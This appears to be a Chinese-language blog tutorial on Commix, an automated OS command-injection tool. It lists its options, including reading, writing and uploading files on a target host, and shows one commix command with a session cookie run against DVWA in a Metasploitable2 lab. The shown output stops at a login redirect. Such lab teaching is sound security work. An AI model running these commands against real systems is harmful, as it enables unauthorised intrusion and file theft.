命令注入工具Commix介紹及使用
阿新 • • 發佈:2022-04-15
Commix 是使用 Python 開發的命令注入漏洞測試工具。 該工具旨在方便地檢測請求是否存在命令注入漏洞並進行測試。
常見選項包括:
目標相關: -u URL, --url = URL target URL. 設定目標URL(即可能存在命令注入漏洞的URL) 請求相關: --data= Data 設定通過POST提交的資料,很重要的一個引數--host= HOST HTTP host header. 設定提交的請求中的host欄位,一般情況下不需要設定--user-agent= AGENT 設定提交的請求中的User-Agent欄位,避免目標網站基於User-Agent進行過濾(比如防爬蟲)--cookie= COOKIE HTTP Cookie header.設定提交的請求中的Cookie值,很重要的一個引數,如果可能存在命令注入漏洞的URL是需要在使用者登入以後才能訪問的情況下,需要帶上該引數--headers= HEADERS additional headers (e.g. "Header1: Value1/nHeader2: Value2"). 設定提交的請求中報文頭部的其他欄位 檔案訪問: These options can be used to access files on the target host. - file-read = FILE .. Read the filefrom the target host. 從目標網站下載的檔案的路徑 - file-write = FIL .. Write a file on the target host. 上傳至目標網站的檔案的路徑(這裡是本地的路徑) - file-upload = FI .. Upload the file on the target host. - file-dest = FILE .. 上傳至目標網站的目標路徑,也就是網站上的路徑(絕對路徑)
以Metaploitable2中的DVWA應用為例進行說明,已經知道該URL存在命令注入漏洞: http://192.168.140.137/dvwa/vulnerabilities/exec/#
現在用Commix對該漏洞進行測試:
# commix -u 'http://192.168.140.137/dvwa/vulnerabilities/exec/#' --cookie='security=low; PHPSESSID=b33b449bd2cb99c0a1b7693627b5d603' --data='ip=INJECT_HERE&submit=submit' [warning] Python version 3.9.10 detected. You are advised to use Python version 2.7.x. __ ___ ___ ___ ___ ___ ___ /\_\ __ _ /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\ v3.3-stable /\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/> </ \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ https://commixproject.com \/____/\/___/ \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ (@commixproject) +-- Automated All-in-One OS Command Injection Exploitation Tool Copyright © 2014-2021 Anastasios Stasinopoulos (@ancst) +-- (!) Legal disclaimer: Usage of commix for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. [warning] You haven't updated commix for more than 212 days! [info] Testing connection to the target URL. [warning] Got a 302 redirection (http://192.168.140.137/dvwa/login.php).